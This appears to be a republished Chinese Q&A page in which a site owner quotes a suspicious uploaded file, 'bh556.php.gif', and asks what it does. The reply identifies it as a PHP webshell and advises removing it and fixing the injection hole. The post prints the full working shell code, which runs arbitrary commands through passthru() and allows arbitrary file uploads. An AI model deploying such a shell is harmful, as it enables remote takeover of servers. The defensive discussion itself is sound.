php – 可能的网站黑客尝试

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了php – 可能的网站黑客尝试，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1309字，纯文字阅读大概需要2分钟。

内容图文

我刚从主人那里得到一个温暖的消息告诉我..
“我们检测到通过http或ftp访问您帐户的恶意企图”

检查过恶意文件后,有人上传了一个名为“bh556.php.gif”的图标

打开此文件,它包含以下代码：

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>

有人可以解释如何防止再次通过图标上传,还请解释上面的代码究竟是做什么的？

解决方法:

它是一个PHP Webshel??l,请参阅here以获取常见的列表.它允许恶意用户通过PHP文件执行命令,这是非常妥协的.

通过标题和一些聪明的技巧将它们隐藏在图像中很常见,请参阅说明here

我的建议,删除文件,解决泄漏的原因,这可能是一些描述的注入攻击.

内容总结

以上是互联网集市为您收集整理的php – 可能的网站黑客尝试全部内容，希望文章能够帮你解决php – 可能的网站黑客尝试所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端